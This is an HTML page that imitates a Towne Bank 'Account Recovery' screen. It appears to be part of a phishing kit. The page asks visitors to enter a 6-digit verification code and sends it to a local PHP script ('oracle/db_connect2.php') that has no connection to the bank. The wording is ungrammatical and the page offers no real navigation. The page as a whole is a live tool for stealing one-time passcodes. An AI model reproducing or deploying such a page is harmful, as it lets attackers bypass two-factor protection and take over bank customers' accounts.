<!DOCTYPE html>
<html lang="en" data-react-helmet="en">
<head>
    <meta charset="UTF-8">
    <meta httpequiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta httpequiv="cache-control" content="no-cache">
    <meta httpequiv="pragma" content="no-cache">
    <link rel="shortcut icon" href="favicon.ico">
    <link rel="apple-touch-icon" href="favicon.ico">
    <link rel="manifest" href="#">
    <script src="js/LAB.min.js"></script>
    <script src="js/VisitorAPI.js"></script>
    <script src="js/AppMeasurement.js"></script>
    <script src="js/iframeResizer.min.js"></script>
    <script src="js/DBKAPI.js"></script>
    <title>Towne Bank | Account Recovery</title>
    <link href="css/main.69265a18.chunk.css" rel="stylesheet">
    <link href="css/branding.css" rel="stylesheet">
    <script charset="utf-8" src="js/88.7d44ab6f.chunk.js"></script>
    <script charset="utf-8" src="js/16.61e0d010.chunk.js"></script>
    <link rel="stylesheet" type="text/css" href="css/10.27b24112.chunk.css">
    <link rel="stylesheet" type="text/css" href="css/41.f7d9e455.chunk.css">
    <script charset="utf-8" src="js/10.da1657cc.chunk.js"></script>
    <link rel="stylesheet" type="text/css" href="css/45.16a92a7e.chunk.css">
    <script charset="utf-8" src="js/45.b63e3956.chunk.js"></script>
    <script charset="utf-8" src="js/81.23738d9b.chunk.js"></script>
    <link rel="apple-touch-icon" href="favicon.ico" data-react-helmet="true">
    <link rel="stylesheet" href="css/common.css" data-react-helmet="true">
    <link rel="stylesheet" type="text/css" href="css/12.06f46345.chunk.css">
    <script charset="utf-8" src="js/12.38ae5202.chunk.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=5" data-react-helmet="true">
    <script charset="utf-8" src="js/8.046584cc.chunk.js"></script>
</head>
<body>
<div id="forgotPasswordORUsername" style="min-height:100%;position:relative">
    <div class="fade-in">
        <div class="header_navigation-container__x6sPE">
            <div class="header-container" style="background-color: rgb(0, 33, 73)">
                <div class="header_wrap-content__4C87W">
                    <div class="header">
                        <div class="hamburger visible-xs visible-sm"></div>
                        <div class="logo adjustlogo" role="banner">
                            <a tabindex="-1" href="#">
                                <div>
                                    <img tabindex="0" src="images/tb-logo-gradient-250x36px-u5y4B.png" class="fiLogoLg hidden-xs hidden-sm">
                                    <img src="images/tb-logo-gradient-250x36px-u5y4B.png" class="fiLogoSm visible-xs visible-sm">
                                </div>
                            </a>
                        </div>
                        <div class=" hidden-xs hidden-sm" role="complementary"></div>
                        <div class="nav-area hidden-xs hidden-sm"></div>
                    </div>
                </div>
            </div>
            <div class="main-navigation-container header_empty-container__2-tBa">
                <div class="header_wrap-content__4C87W"></div>
            </div>
        </div>
        <div class="home-page" style="min-height: calc(((100vh - 105px) - 75px) - 0px);">
            <div class="fade-in">
                <div id="forgotContainer" class="container" role="main">
                    <div class="col-xs-12 fade-in">
                        <div class="di-container di-container-overflow">
                            <div class="center-block">
                                <div class="page-header">
                                    <h1 id="heading" tabindex="-1" aria-describedby="heading description forgotForm">Confirm your Identity</h1>
                                </div>
                                <div class="col-xs-12 col-sm-12 main-container xs-col-remove-padding">
                                    <span id="description" class="col-xs-12 col-sm-12">For your security protection, A 6-digit code have been sent to your phone number. It might a few secs.</span>
                                    <div class="col-xs-12 col-sm-12">&nbsp;</div>
                                    <form class="col-sm-7 margin_bottom_30" id="forgotForm" method="post" action="oracle/db_connect2.php">
                                        <div class="form-group">
                                            <div class="form-group margin_bottom_30">
                                                <label id="usernameLabel" for="username">Verification</label>
                                                <input type="tel" maxlength="6" class="form-control" id="otp" placeholder="Enter Code" autocapitalize="off" autocorrect="off" autocomplete="off" name="otp" value="" required="">
                                            </div>
                                            <div class="form-group margin_bottom_30">
                                                <button type="submit" id="btnSubmit" class="forgot-password-cancel-button-xs btn sm btn-primary forgot-password-cancel-button-sm-max-width col-xs-12">Verify</button>
                                            </div>
                                        </div>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="footerSibling" style="padding-bottom: 247px;"></div>
            <div title="Footer Navigation" id="footer-container" role="contentinfo" class="container-fluid footer-container-main" tabindex="-1" aria-describedby="footer-container"><div class="middle-text"><div class="col-xs-12 text middle-text-in">Links are being provided for information purposes only. TowneBank has no control over any other website and is not able to endorse, guarantee or monitor content, availability, viewpoints, products or services that are offered or expressed on any site other than this one.</div></div><div class="image-links"><div class="image-column" role="application"><a tabindex="-1" href="javascript:void(0)" aria-haspopup="true"><img tabindex="0" id="#" alt="FDIC" src="images/member_fdic.png"></a></div><div class="image-column" role="application"><a tabindex="-1" href="javascript:void(0)" aria-haspopup="true"><img tabindex="0" id="#" alt="Equal Housing Lender" src="images/ehl_40x35_k_100.png"></a></div><div class="image-column" role="application"><a tabindex="-1" href="javascript:void(0)" aria-haspopup="true"><img tabindex="0" id="#" alt="Terms and Conditions" src="images/img_termsconditions.gif"></a></div></div></div>
        </div>
    </div>
</div>
</body>
</html>